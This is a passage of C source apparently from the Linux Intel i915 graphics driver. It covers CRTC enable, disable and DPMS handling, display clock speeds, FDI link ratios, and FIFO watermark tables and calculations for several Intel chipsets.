u32 bpc = (I915_READ(PIPECONF(pipe)) & PIPE_BPC_MASK) >> 5;
reg = TRANS_DP_CTL(pipe);
temp = I915_READ(reg);
temp &= ~(TRANS_DP_PORT_SEL_MASK |
TRANS_DP_SYNC_MASK |
TRANS_DP_BPC_MASK);
temp |= (TRANS_DP_OUTPUT_ENABLE |
TRANS_DP_ENH_FRAMING);
temp |= bpc << 9; /* same format but at 11:9 */
if (crtc->mode.flags & DRM_MODE_FLAG_PHSYNC)
temp |= TRANS_DP_HSYNC_ACTIVE_HIGH;
if (crtc->mode.flags & DRM_MODE_FLAG_PVSYNC)
temp |= TRANS_DP_VSYNC_ACTIVE_HIGH;
switch (intel_trans_dp_port_sel(crtc)) {
case PCH_DP_B:
temp |= TRANS_DP_PORT_SEL_B;
break;
case PCH_DP_C:
temp |= TRANS_DP_PORT_SEL_C;
break;
case PCH_DP_D:
temp |= TRANS_DP_PORT_SEL_D;
break;
default:
DRM_DEBUG_KMS("Wrong PCH DP port return. Guess port B\n");
temp |= TRANS_DP_PORT_SEL_B;
break;
}
I915_WRITE(reg, temp);
}
intel_enable_transcoder(dev_priv, pipe);
}
static void ironlake_crtc_enable(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int plane = intel_crtc->plane;
u32 temp;
bool is_pch_port;
if (intel_crtc->active)
return;
intel_crtc->active = true;
intel_update_watermarks(dev);
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)) {
temp = I915_READ(PCH_LVDS);
if ((temp & LVDS_PORT_EN) == 0)
I915_WRITE(PCH_LVDS, temp | LVDS_PORT_EN);
}
is_pch_port = intel_crtc_driving_pch(crtc);
if (is_pch_port)
ironlake_fdi_pll_enable(crtc);
else
ironlake_fdi_disable(crtc);
/* Enable panel fitting for LVDS */
if (dev_priv->pch_pf_size &&
(intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS) || HAS_eDP)) {
/* Force use of hard-coded filter coefficients
* as some pre-programmed values are broken,
* e.g. x201.
*/
I915_WRITE(PF_CTL(pipe), PF_ENABLE | PF_FILTER_MED_3x3);
I915_WRITE(PF_WIN_POS(pipe), dev_priv->pch_pf_pos);
I915_WRITE(PF_WIN_SZ(pipe), dev_priv->pch_pf_size);
}
/*
* On ILK+ LUT must be loaded before the pipe is running but with
* clocks enabled
*/
intel_crtc_load_lut(crtc);
intel_enable_pipe(dev_priv, pipe, is_pch_port);
intel_enable_plane(dev_priv, plane, pipe);
if (is_pch_port)
ironlake_pch_enable(crtc);
mutex_lock(&dev->struct_mutex);
intel_update_fbc(dev);
mutex_unlock(&dev->struct_mutex);
intel_crtc_update_cursor(crtc, true);
}
static void ironlake_crtc_disable(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int plane = intel_crtc->plane;
u32 reg, temp;
if (!intel_crtc->active)
return;
intel_crtc_wait_for_pending_flips(crtc);
drm_vblank_off(dev, pipe);
intel_crtc_update_cursor(crtc, false);
intel_disable_plane(dev_priv, plane, pipe);
if (dev_priv->cfb_plane == plane)
intel_disable_fbc(dev);
intel_disable_pipe(dev_priv, pipe);
/* Disable PF */
I915_WRITE(PF_CTL(pipe), 0);
I915_WRITE(PF_WIN_SZ(pipe), 0);
ironlake_fdi_disable(crtc);
/* This is a horrible layering violation; we should be doing this in
* the connector/encoder ->prepare instead, but we don't always have
* enough information there about the config to know whether it will
* actually be necessary or just cause undesired flicker.
*/
intel_disable_pch_ports(dev_priv, pipe);
intel_disable_transcoder(dev_priv, pipe);
if (HAS_PCH_CPT(dev)) {
/* disable TRANS_DP_CTL */
reg = TRANS_DP_CTL(pipe);
temp = I915_READ(reg);
temp &= ~(TRANS_DP_OUTPUT_ENABLE | TRANS_DP_PORT_SEL_MASK);
temp |= TRANS_DP_PORT_SEL_NONE;
I915_WRITE(reg, temp);
/* disable DPLL_SEL */
temp = I915_READ(PCH_DPLL_SEL);
switch (pipe) {
case 0:
temp &= ~(TRANSA_DPLL_ENABLE | TRANSA_DPLLA_SEL);
break;
case 1:
temp &= ~(TRANSB_DPLL_ENABLE | TRANSB_DPLLB_SEL);
break;
case 2:
/* FIXME: manage transcoder PLLs? */
temp &= ~(TRANSC_DPLL_ENABLE | TRANSC_DPLLB_SEL);
break;
default:
BUG(); /* wtf */
}
I915_WRITE(PCH_DPLL_SEL, temp);
}
/* disable PCH DPLL */
intel_disable_pch_pll(dev_priv, pipe);
/* Switch from PCDclk to Rawclk */
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
I915_WRITE(reg, temp & ~FDI_PCDCLK);
/* Disable CPU FDI TX PLL */
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
I915_WRITE(reg, temp & ~FDI_TX_PLL_ENABLE);
POSTING_READ(reg);
udelay(100);
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
I915_WRITE(reg, temp & ~FDI_RX_PLL_ENABLE);
/* Wait for the clocks to turn off. */
POSTING_READ(reg);
udelay(100);
intel_crtc->active = false;
intel_update_watermarks(dev);
mutex_lock(&dev->struct_mutex);
intel_update_fbc(dev);
intel_clear_scanline_wait(dev);
mutex_unlock(&dev->struct_mutex);
}
static void ironlake_crtc_dpms(struct drm_crtc *crtc, int mode)
{
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int plane = intel_crtc->plane;
/* XXX: When our outputs are all unaware of DPMS modes other than off
* and on, we should map those modes to DRM_MODE_DPMS_OFF in the CRTC.
*/
switch (mode) {
case DRM_MODE_DPMS_ON:
case DRM_MODE_DPMS_STANDBY:
case DRM_MODE_DPMS_SUSPEND:
DRM_DEBUG_KMS("crtc %d/%d dpms on\n", pipe, plane);
ironlake_crtc_enable(crtc);
break;
case DRM_MODE_DPMS_OFF:
DRM_DEBUG_KMS("crtc %d/%d dpms off\n", pipe, plane);
ironlake_crtc_disable(crtc);
break;
}
}
static void intel_crtc_dpms_overlay(struct intel_crtc *intel_crtc, bool enable)
{
if (!enable && intel_crtc->overlay) {
struct drm_device *dev = intel_crtc->base.dev;
struct drm_i915_private *dev_priv = dev->dev_private;
mutex_lock(&dev->struct_mutex);
dev_priv->mm.interruptible = false;
(void) intel_overlay_switch_off(intel_crtc->overlay);
dev_priv->mm.interruptible = true;
mutex_unlock(&dev->struct_mutex);
}
/* Let userspace switch the overlay on again. In most cases userspace
* has to recompute where to put it anyway.
*/
}
static void i9xx_crtc_enable(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int plane = intel_crtc->plane;
if (intel_crtc->active)
return;
intel_crtc->active = true;
intel_update_watermarks(dev);
intel_enable_pll(dev_priv, pipe);
intel_enable_pipe(dev_priv, pipe, false);
intel_enable_plane(dev_priv, plane, pipe);
intel_crtc_load_lut(crtc);
intel_update_fbc(dev);
/* Give the overlay scaler a chance to enable if it's on this pipe */
intel_crtc_dpms_overlay(intel_crtc, true);
intel_crtc_update_cursor(crtc, true);
}
static void i9xx_crtc_disable(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int plane = intel_crtc->plane;
if (!intel_crtc->active)
return;
/* Give the overlay scaler a chance to disable if it's on this pipe */
intel_crtc_wait_for_pending_flips(crtc);
drm_vblank_off(dev, pipe);
intel_crtc_dpms_overlay(intel_crtc, false);
intel_crtc_update_cursor(crtc, false);
if (dev_priv->cfb_plane == plane)
intel_disable_fbc(dev);
intel_disable_plane(dev_priv, plane, pipe);
intel_disable_pipe(dev_priv, pipe);
intel_disable_pll(dev_priv, pipe);
intel_crtc->active = false;
intel_update_fbc(dev);
intel_update_watermarks(dev);
intel_clear_scanline_wait(dev);
}
static void i9xx_crtc_dpms(struct drm_crtc *crtc, int mode)
{
/* XXX: When our outputs are all unaware of DPMS modes other than off
* and on, we should map those modes to DRM_MODE_DPMS_OFF in the CRTC.
*/
switch (mode) {
case DRM_MODE_DPMS_ON:
case DRM_MODE_DPMS_STANDBY:
case DRM_MODE_DPMS_SUSPEND:
i9xx_crtc_enable(crtc);
break;
case DRM_MODE_DPMS_OFF:
i9xx_crtc_disable(crtc);
break;
}
}
/**
* Sets the power management mode of the pipe and plane.
*/
static void intel_crtc_dpms(struct drm_crtc *crtc, int mode)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_i915_master_private *master_priv;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
bool enabled;
if (intel_crtc->dpms_mode == mode)
return;
intel_crtc->dpms_mode = mode;
dev_priv->display.dpms(crtc, mode);
if (!dev->primary->master)
return;
master_priv = dev->primary->master->driver_priv;
if (!master_priv->sarea_priv)
return;
enabled = crtc->enabled && mode != DRM_MODE_DPMS_OFF;
switch (pipe) {
case 0:
master_priv->sarea_priv->pipeA_w = enabled ? crtc->mode.hdisplay : 0;
master_priv->sarea_priv->pipeA_h = enabled ? crtc->mode.vdisplay : 0;
break;
case 1:
master_priv->sarea_priv->pipeB_w = enabled ? crtc->mode.hdisplay : 0;
master_priv->sarea_priv->pipeB_h = enabled ? crtc->mode.vdisplay : 0;
break;
default:
DRM_ERROR("Can't update pipe %c in SAREA\n", pipe_name(pipe));
break;
}
}
static void intel_crtc_disable(struct drm_crtc *crtc)
{
struct drm_crtc_helper_funcs *crtc_funcs = crtc->helper_private;
struct drm_device *dev = crtc->dev;
crtc_funcs->dpms(crtc, DRM_MODE_DPMS_OFF);
if (crtc->fb) {
mutex_lock(&dev->struct_mutex);
i915_gem_object_unpin(to_intel_framebuffer(crtc->fb)->obj);
mutex_unlock(&dev->struct_mutex);
}
}
/* Prepare for a mode set.
*
* Note we could be a lot smarter here. We need to figure out which outputs
* will be enabled, which disabled (in short, how the config will changes)
* and perform the minimum necessary steps to accomplish that, e.g. updating
* watermarks, FBC configuration, making sure PLLs are programmed correctly,
* panel fitting is in the proper state, etc.
*/
static void i9xx_crtc_prepare(struct drm_crtc *crtc)
{
i9xx_crtc_disable(crtc);
}
static void i9xx_crtc_commit(struct drm_crtc *crtc)
{
i9xx_crtc_enable(crtc);
}
static void ironlake_crtc_prepare(struct drm_crtc *crtc)
{
ironlake_crtc_disable(crtc);
}
static void ironlake_crtc_commit(struct drm_crtc *crtc)
{
ironlake_crtc_enable(crtc);
}
void intel_encoder_prepare (struct drm_encoder *encoder)
{
struct drm_encoder_helper_funcs *encoder_funcs = encoder->helper_private;
/* lvds has its own version of prepare see intel_lvds_prepare */
encoder_funcs->dpms(encoder, DRM_MODE_DPMS_OFF);
}
void intel_encoder_commit (struct drm_encoder *encoder)
{
struct drm_encoder_helper_funcs *encoder_funcs = encoder->helper_private;
/* lvds has its own version of commit see intel_lvds_commit */
encoder_funcs->dpms(encoder, DRM_MODE_DPMS_ON);
}
void intel_encoder_destroy(struct drm_encoder *encoder)
{
struct intel_encoder *intel_encoder = to_intel_encoder(encoder);
drm_encoder_cleanup(encoder);
kfree(intel_encoder);
}
static bool intel_crtc_mode_fixup(struct drm_crtc *crtc,
struct drm_display_mode *mode,
struct drm_display_mode *adjusted_mode)
{
struct drm_device *dev = crtc->dev;
if (HAS_PCH_SPLIT(dev)) {
/* FDI link clock is fixed at 2.7G */
if (mode->clock * 3 > IRONLAKE_FDI_FREQ * 4)
return false;
}
/* XXX some encoders set the crtcinfo, others don't.
* Obviously we need some form of conflict resolution here...
*/
if (adjusted_mode->crtc_htotal == 0)
drm_mode_set_crtcinfo(adjusted_mode, 0);
return true;
}
static int i945_get_display_clock_speed(struct drm_device *dev)
{
return 400000;
}
static int i915_get_display_clock_speed(struct drm_device *dev)
{
return 333000;
}
static int i9xx_misc_get_display_clock_speed(struct drm_device *dev)
{
return 200000;
}
static int i915gm_get_display_clock_speed(struct drm_device *dev)
{
u16 gcfgc = 0;
pci_read_config_word(dev->pdev, GCFGC, &gcfgc);
if (gcfgc & GC_LOW_FREQUENCY_ENABLE)
return 133000;
else {
switch (gcfgc & GC_DISPLAY_CLOCK_MASK) {
case GC_DISPLAY_CLOCK_333_MHZ:
return 333000;
default:
case GC_DISPLAY_CLOCK_190_200_MHZ:
return 190000;
}
}
}
static int i865_get_display_clock_speed(struct drm_device *dev)
{
return 266000;
}
static int i855_get_display_clock_speed(struct drm_device *dev)
{
u16 hpllcc = 0;
/* Assume that the hardware is in the high speed state. This
* should be the default.
*/
switch (hpllcc & GC_CLOCK_CONTROL_MASK) {
case GC_CLOCK_133_200:
case GC_CLOCK_100_200:
return 200000;
case GC_CLOCK_166_250:
return 250000;
case GC_CLOCK_100_133:
return 133000;
}
/* Shouldn't happen */
return 0;
}
static int i830_get_display_clock_speed(struct drm_device *dev)
{
return 133000;
}
struct fdi_m_n {
u32 tu;
u32 gmch_m;
u32 gmch_n;
u32 link_m;
u32 link_n;
};
static void
fdi_reduce_ratio(u32 *num, u32 *den)
{
while (*num > 0xffffff || *den > 0xffffff) {
*num >>= 1;
*den >>= 1;
}
}
static void
ironlake_compute_m_n(int bits_per_pixel, int nlanes, int pixel_clock,
int link_clock, struct fdi_m_n *m_n)
{
m_n->tu = 64; /* default size */
/* BUG_ON(pixel_clock > INT_MAX / 36); */
m_n->gmch_m = bits_per_pixel * pixel_clock;
m_n->gmch_n = link_clock * nlanes * 8;
fdi_reduce_ratio(&m_n->gmch_m, &m_n->gmch_n);
m_n->link_m = pixel_clock;
m_n->link_n = link_clock;
fdi_reduce_ratio(&m_n->link_m, &m_n->link_n);
}
struct intel_watermark_params {
unsigned long fifo_size;
unsigned long max_wm;
unsigned long default_wm;
unsigned long guard_size;
unsigned long cacheline_size;
};
/* Pineview has different values for various configs */
static const struct intel_watermark_params pineview_display_wm = {
PINEVIEW_DISPLAY_FIFO,
PINEVIEW_MAX_WM,
PINEVIEW_DFT_WM,
PINEVIEW_GUARD_WM,
PINEVIEW_FIFO_LINE_SIZE
};
static const struct intel_watermark_params pineview_display_hplloff_wm = {
PINEVIEW_DISPLAY_FIFO,
PINEVIEW_MAX_WM,
PINEVIEW_DFT_HPLLOFF_WM,
PINEVIEW_GUARD_WM,
PINEVIEW_FIFO_LINE_SIZE
};
static const struct intel_watermark_params pineview_cursor_wm = {
PINEVIEW_CURSOR_FIFO,
PINEVIEW_CURSOR_MAX_WM,
PINEVIEW_CURSOR_DFT_WM,
PINEVIEW_CURSOR_GUARD_WM,
PINEVIEW_FIFO_LINE_SIZE,
};
static const struct intel_watermark_params pineview_cursor_hplloff_wm = {
PINEVIEW_CURSOR_FIFO,
PINEVIEW_CURSOR_MAX_WM,
PINEVIEW_CURSOR_DFT_WM,
PINEVIEW_CURSOR_GUARD_WM,
PINEVIEW_FIFO_LINE_SIZE
};
static const struct intel_watermark_params g4x_wm_info = {
G4X_FIFO_SIZE,
G4X_MAX_WM,
G4X_MAX_WM,
2,
G4X_FIFO_LINE_SIZE,
};
static const struct intel_watermark_params g4x_cursor_wm_info = {
I965_CURSOR_FIFO,
I965_CURSOR_MAX_WM,
I965_CURSOR_DFT_WM,
2,
G4X_FIFO_LINE_SIZE,
};
static const struct intel_watermark_params i965_cursor_wm_info = {
I965_CURSOR_FIFO,
I965_CURSOR_MAX_WM,
I965_CURSOR_DFT_WM,
2,
I915_FIFO_LINE_SIZE,
};
static const struct intel_watermark_params i945_wm_info = {
I945_FIFO_SIZE,
I915_MAX_WM,
1,
2,
I915_FIFO_LINE_SIZE
};
static const struct intel_watermark_params i915_wm_info = {
I915_FIFO_SIZE,
I915_MAX_WM,
1,
2,
I915_FIFO_LINE_SIZE
};
static const struct intel_watermark_params i855_wm_info = {
I855GM_FIFO_SIZE,
I915_MAX_WM,
1,
2,
I830_FIFO_LINE_SIZE
};
static const struct intel_watermark_params i830_wm_info = {
I830_FIFO_SIZE,
I915_MAX_WM,
1,
2,
I830_FIFO_LINE_SIZE
};
static const struct intel_watermark_params ironlake_display_wm_info = {
ILK_DISPLAY_FIFO,
ILK_DISPLAY_MAXWM,
ILK_DISPLAY_DFTWM,
2,
ILK_FIFO_LINE_SIZE
};
static const struct intel_watermark_params ironlake_cursor_wm_info = {
ILK_CURSOR_FIFO,
ILK_CURSOR_MAXWM,
ILK_CURSOR_DFTWM,
2,
ILK_FIFO_LINE_SIZE
};
static const struct intel_watermark_params ironlake_display_srwm_info = {
ILK_DISPLAY_SR_FIFO,
ILK_DISPLAY_MAX_SRWM,
ILK_DISPLAY_DFT_SRWM,
2,
ILK_FIFO_LINE_SIZE
};
static const struct intel_watermark_params ironlake_cursor_srwm_info = {
ILK_CURSOR_SR_FIFO,
ILK_CURSOR_MAX_SRWM,
ILK_CURSOR_DFT_SRWM,
2,
ILK_FIFO_LINE_SIZE
};
static const struct intel_watermark_params sandybridge_display_wm_info = {
SNB_DISPLAY_FIFO,
SNB_DISPLAY_MAXWM,
SNB_DISPLAY_DFTWM,
2,
SNB_FIFO_LINE_SIZE
};
static const struct intel_watermark_params sandybridge_cursor_wm_info = {
SNB_CURSOR_FIFO,
SNB_CURSOR_MAXWM,
SNB_CURSOR_DFTWM,
2,
SNB_FIFO_LINE_SIZE
};
static const struct intel_watermark_params sandybridge_display_srwm_info = {
SNB_DISPLAY_SR_FIFO,
SNB_DISPLAY_MAX_SRWM,
SNB_DISPLAY_DFT_SRWM,
2,
SNB_FIFO_LINE_SIZE
};
static const struct intel_watermark_params sandybridge_cursor_srwm_info = {
SNB_CURSOR_SR_FIFO,
SNB_CURSOR_MAX_SRWM,
SNB_CURSOR_DFT_SRWM,
2,
SNB_FIFO_LINE_SIZE
};
/**
* intel_calculate_wm - calculate watermark level
* @clock_in_khz: pixel clock
* @wm: chip FIFO params
* @pixel_size: display pixel size
* @latency_ns: memory latency for the platform
*
* Calculate the watermark level (the level at which the display plane will
* start fetching from memory again). Each chip has a different display
* FIFO size and allocation, so the caller needs to figure that out and pass
* in the correct intel_watermark_params structure.
*
* As the pixel clock runs, the FIFO will be drained at a rate that depends
* on the pixel size. When it reaches the watermark level, it'll start
* fetching FIFO line sized based chunks from memory until the FIFO fills
* past the watermark point. If the FIFO drains completely, a FIFO underrun
* will occur, and a display engine hang could result.
*/
static unsigned long intel_calculate_wm(unsigned long clock_in_khz,
const struct intel_watermark_params *wm,
int fifo_size,
int pixel_size,
unsigned long latency_ns)
{
long entries_required, wm_size;
/*
* Note: we need to make sure we don't overflow for various clock &
* latency values.
* clocks go from a few thousand to several hundred thousand.
* latency is usually a few thousand
*/
entries_required = ((clock_in_khz / 1000) * pixel_size * latency_ns) /
1000;
entries_required = DIV_ROUND_UP(entries_required, wm->cacheline_size);
DRM_DEBUG_KMS("FIFO entries required for mode: %ld\n", entries_required);
wm_size = fifo_size - (entries_required + wm->guard_size);
DRM_DEBUG_KMS("FIFO watermark level: %ld\n", wm_size);
/* Don't promote wm_size to unsigned... */
if (wm_size > (long)wm->max_wm)
wm_size = wm->max_wm;
if (wm_size <= 0)
wm_size = wm->default_wm;
return wm_size;
}
struct cxsr_latency {
int is_desktop;
int is_ddr3;
unsigned long fsb_freq;
unsigned long mem_freq;
unsigned long display_sr;
unsigned long display_hpll_disable;
unsigned long cursor_sr;
unsigned long cursor_hpll_disable;
};
static const struct cxsr_latency cxsr_latency_table[] = {
{1, 0, 800, 400, 3382, 33382, 3983, 33983}, /* DDR2-400 SC */
{1, 0, 800, 667, 3354, 33354, 3807, 33807}, /* DDR2-667 SC */
{1, 0, 800, 800, 3347, 33347, 3763, 33763}, /* DDR2-800 SC */
{1, 1, 800, 667, 6420, 36420, 6873, 36873}, /* DDR3-667 SC */
{1, 1, 800, 800, 5902, 35902, 6318, 36318}, /* DDR3-800 SC */
{1, 0, 667, 400, 3400, 33400, 4021, 34021}, /* DDR2-400 SC */
{1, 0, 667, 667, 3372, 33372, 3845, 33845}, /* DDR2-667 SC */
{1, 0, 667, 800, 3386, 33386, 3822, 33822}, /* DDR2-800 SC */
{1, 1, 667, 667, 6438, 36438, 6911, 36911}, /* DDR3-667 SC */
{1, 1, 667, 800, 5941, 35941, 6377, 36377}, /* DDR3-800 SC */
{1, 0, 400, 400, 3472, 33472, 4173, 34173}, /* DDR2-400 SC */
{1, 0, 400, 667, 3443, 33443, 3996, 33996}, /* DDR2-667 SC */
{1, 0, 400, 800, 3430, 33430, 3946, 33946}, /* DDR2-800 SC */
{1, 1, 400, 667, 6509, 36509, 7062, 37062}, /* DDR3-667 SC */
{1, 1, 400, 800, 5985, 35985, 6501, 36501}, /* DDR3-800 SC */
{0, 0, 800, 400, 3438, 33438, 4065, 34065}, /* DDR2-400 SC */
{0, 0, 800, 667, 3410, 33410, 3889, 33889}, /* DDR2-667 SC */
{0, 0, 800, 800, 3403, 33403, 3845, 33845}, /* DDR2-800 SC */
{0, 1, 800, 667, 6476, 36476, 6955, 36955}, /* DDR3-667 SC */
{0, 1, 800, 800, 5958, 35958, 6400, 36400}, /* DDR3-800 SC */
{0, 0, 667, 400, 3456, 33456, 4103, 34106}, /* DDR2-400 SC */
{0, 0, 667, 667, 3428, 33428, 3927, 33927}, /* DDR2-667 SC */
{0, 0, 667, 800, 3443, 33443, 3905, 33905}, /* DDR2-800 SC */
{0, 1, 667, 667, 6494, 36494, 6993, 36993}, /* DDR3-667 SC */
{0, 1, 667, 800, 5998, 35998, 6460, 36460}, /* DDR3-800 SC */
{0, 0, 400, 400, 3528, 33528, 4255, 34255}, /* DDR2-400 SC */
{0, 0, 400, 667, 3500, 33500, 4079, 34079}, /* DDR2-667 SC */
{0, 0, 400, 800, 3487, 33487, 4029, 34029}, /* DDR2-800 SC */
{0, 1, 400, 667, 6566, 36566, 7145, 37145}, /* DDR3-667 SC */
{0, 1, 400, 800, 6042, 36042, 6584, 36584}, /* DDR3-800 SC */
};
static const struct cxsr_latency *intel_get_cxsr_latency(int is_desktop,
int is_ddr3,
int fsb,
int mem)
{
const struct cxsr_latency *latency;
int i;
if (fsb == 0 || mem == 0)
return NULL;
for (i = 0; i < ARRAY_SIZE(cxsr_latency_table); i++) {
latency = &cxsr_latency_table[i];
if (is_desktop == latency->is_desktop &&
is_ddr3 == latency->is_ddr3 &&
fsb == latency->fsb_freq && mem == latency->mem_freq)
return latency;
}
DRM_DEBUG_KMS("Unknown FSB/MEM found, disable CxSR\n");
return NULL;
}
static void pineview_disable_cxsr(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
/* deactivate cxsr */
I915_WRITE(DSPFW3, I915_READ(DSPFW3) & ~PINEVIEW_SELF_REFRESH_EN);
}
/*
* Latency for FIFO fetches is dependent on several factors:
* - memory configuration (speed, channels)
* - chipset
* - current MCH state
* It can be fairly high in some situations, so here we assume a fairly
* pessimal value. It's a tradeoff between extra memory fetches (if we
* set this value too high, the FIFO will fetch frequently to stay full)
* and power consumption (set it too low to save power and we might see
* FIFO underruns and display "flicker").
*
* A value of 5us seems to be a good balance; safe for very low end
* platforms but not overly aggressive on lower latency configs.
*/
static const int latency_ns = 5000;
static int i9xx_get_fifo_size(struct drm_device *dev, int plane)
{
struct drm_i915_private *dev_priv = dev->dev_private;
uint32_t dsparb = I915_READ(DSPARB);
int size;
size = dsparb & 0x7f;
if (plane)
size = ((dsparb >> DSPARB_CSTART_SHIFT) & 0x7f) - size;
DRM_DEBUG_KMS("FIFO size - (0x%08x) %s: %d\n", dsparb,
plane ? "B" : "A", size);
return size;
}
static int i85x_get_fifo_size(struct drm_device *dev, int plane)
{
struct drm_i915_private *dev_priv = dev->dev_private;
uint32_t dsparb = I915_READ(DSPARB);
int size;
size = dsparb & 0x1ff;
if (plane)
size = ((dsparb >> DSPARB_BEND_SHIFT) & 0x1ff) - size;
size >>= 1; /* Convert to cachelines */
DRM_DEBUG_KMS("FIFO size - (0x%08x) %s: %d\n", dsparb,
plane ? "B" : "A", size);
return size;
}
static int i845_get_fifo_size(struct drm_device *dev, int plane)
{
struct drm_i915_private *dev_priv = dev->dev_private;
uint32_t dsparb = I915_READ(DSPARB);
int size;
size = dsparb & 0x7f;
size >>= 2; /* Convert to cachelines */
DRM_DEBUG_KMS("FIFO size - (0x%08x) %s: %d\n", dsparb,
plane ? "B" : "A",
size);
return size;
}
static int i830_get_fifo_size(struct drm_device *dev, int plane)
{
struct drm_i915_private *dev_priv = dev->dev_private;
uint32_t dsparb = I915_READ(DSPARB);
int size;
size = dsparb & 0x7f;
size >>= 1; /* Convert to cachelines */
DRM_DEBUG_KMS("FIFO size - (0x%08x) %s: %d\n", dsparb,
plane ? "B" : "A", size);
return size;
}
static struct drm_crtc *single_enabled_crtc(struct drm_device *dev)
{
struct drm_crtc *crtc, *enabled = NULL;
list_for_each_entry(crtc, &dev->mode_config.crtc_list, head) {
if (crtc->enabled && crtc->fb) {
if (enabled)
return NULL;
enabled = crtc;
}
}
return enabled;
}
static void pineview_update_wm(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_crtc *crtc;
const struct cxsr_latency *latency;
u32 reg;
unsigned long wm;
latency = intel_get_cxsr_latency(IS_PINEVIEW_G(dev), dev_priv->is_ddr3,
dev_priv->fsb_freq, dev_priv->mem_freq);
if (!latency) {
DRM_DEBUG_KMS("Unknown FSB/MEM found, disable CxSR\n");
pineview_disable_cxsr(dev);
return;
}
crtc = single_enabled_crtc(dev);
if (crtc) {
int clock = crtc->mode.clock;
int pixel_size = crtc->fb->bits_per_pixel / 8;
/* Display SR */
wm = intel_calculate_wm(clock, &pineview_display_wm,
pineview_display_wm.fifo_size,
pixel_size, latency->display_sr);
reg = I915_READ(DSPFW1);
reg &= ~DSPFW_SR_MASK;
reg |= wm << DSPFW_SR_SHIFT;
I915_WRITE(DSPFW1, reg);
DRM_DEBUG_KMS("DSPFW1 register is %x\n", reg);
/* cursor SR */
wm = intel_calculate_wm(clock, &pineview_cursor_wm,
pineview_display_wm.fifo_size,
pixel_size, latency->cursor_sr);
reg = I915_READ(DSPFW3);
reg &= ~DSPFW_CURSOR_SR_MASK;
reg |= (wm & 0x3f) << DSPFW_CURSOR_SR_SHIFT;
I915_WRITE(DSPFW3, reg);
/* Display HPLL off SR */
wm = intel_calculate_wm(clock, &pineview_display_hplloff_wm,
pineview_display_hplloff_wm.fifo_size,
pixel_size, latency->display_hpll_disable);
reg = I915_READ(DSPFW3);
reg &= ~DSPFW_HPLL_SR_MASK;
reg |= wm & DSPFW_HPLL_SR_MASK;
I915_WRITE(DSPFW3, reg);
/* cursor HPLL off SR */
wm = intel_calculate_wm(clock, &pineview_cursor_hplloff_wm,
pineview_display_hplloff_wm.fifo_size,
pixel_size, latency->cursor_hpll_disable);
reg = I915_READ(DSPFW3);
reg &= ~DSPFW_HPLL_CURSOR_MASK;
reg |= (wm & 0x3f) << DSPFW_HPLL_CURSOR_SHIFT;
I915_WRITE(DSPFW3, reg);
DRM_DEBUG_KMS("DSPFW3 register is %x\n", reg);
/* activate cxsr */
I915_WRITE(DSPFW3,
I915_READ(DSPFW3) | PINEVIEW_SELF_REFRESH_EN);
DRM_DEBUG_KMS("Self-refresh is enabled\n");
} else {
pineview_disable_cxsr(dev);
DRM_DEBUG_KMS("Self-refresh is disabled\n");
}
}
static bool g4x_compute_wm0(struct drm_device *dev,
int plane,
const struct intel_watermark_params *display,
int display_latency_ns,
const struct intel_watermark_params *cursor,
int cursor_latency_ns,
int *plane_wm,
int *cursor_wm)
{
struct drm_crtc *crtc;
int htotal, hdisplay, clock, pixel_size;
int line_time_us, line_count;
int entries, tlb_miss;
crtc = intel_get_crtc_for_plane(dev, plane);
if (crtc->fb == NULL || !crtc->enabled) {
*cursor_wm = cursor->guard_size;
*plane_wm = display->guard_size;
return false;
}
htotal = crtc->mode.htotal;
hdisplay = crtc->mode.hdisplay;
clock = crtc->mode.clock;
pixel_size = crtc->fb->bits_per_pixel / 8;
/* Use the small buffer method to calculate plane watermark */
entries = ((clock * pixel_size / 1000) * display_latency_ns) / 1000;
tlb_miss = display->fifo_size*display->cacheline_size - hdisplay * 8;
if (tlb_miss > 0)
entries += tlb_miss;
entries = DIV_ROUND_UP(entries, display->cacheline_size);
*plane_wm = entries + display->guard_size;
if (*plane_wm > (int)display->max_wm)
*plane_wm = display->max_wm;
/* Use the large buffer method to calculate cursor watermark */
line_time_us = ((htotal * 1000) / clock);
line_count = (cursor_latency_ns / line_time_us + 1000) / 1000;
entries = line_count * 64 * pixel_size;
tlb_miss = cursor->fifo_size*cursor->cacheline_size - hdisplay * 8;
if (tlb_miss > 0)
entries += tlb_miss;
entries = DIV_ROUND_UP(entries, cursor->cacheline_size);
*cursor_wm = entries + cursor->guard_size;
if (*cursor_wm > (int)cursor->max_wm)
*cursor_wm = (int)cursor->max_wm;
return true;
}
/*
* Check the wm result.
*
* If any calculated watermark values is larger than the maximum value that
* can be programmed into the associated watermark register, that watermark
* must be disabled.
*/
static bool g4x_check_srwm(struct drm_device *dev,
int display_wm, int cursor_wm,
const struct intel_watermark_params *display,
const struct intel_watermark_params *cursor)
{
DRM_DEBUG_KMS("SR watermark: display plane %d, cursor %d\n",
display_wm, cursor_wm);
if (display_wm > display->max_wm) {
DRM_DEBUG_KMS("display watermark is too large(%d/%ld), disabling\n",
display_wm, display->max_wm);
return false;
}
if (cursor_wm > cursor->max_wm) {
